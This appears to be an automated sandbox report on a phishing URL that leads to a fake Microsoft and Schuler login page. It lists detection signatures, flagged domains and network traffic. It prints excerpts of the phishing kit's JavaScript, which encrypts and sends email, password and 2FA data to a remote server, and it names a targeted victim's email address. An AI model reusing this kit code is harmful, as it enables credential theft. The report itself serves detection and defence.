Windows Analysis Report
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT_714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519_47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT

Overview

General Information

Sample URL:	https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx
Analysis ID:	1466693
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	Avira URL Cloud: Label: malware
Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/favicon.ico	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/#-	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv
Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched

Phishing site detected (based on shot match)

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',

HTML body contains low number of good links

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML page contains hidden URLs or javascript code

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...

HTML title does not match URL

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Title: Fair Value does not match URL

Invalid T&C link found

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:49712 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:61005 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:62906 -> 162.159.36.2:53

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: global traffic	HTTP traffic detected: GET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1Host: www.itanhangasaude.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.itanhangasaude.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
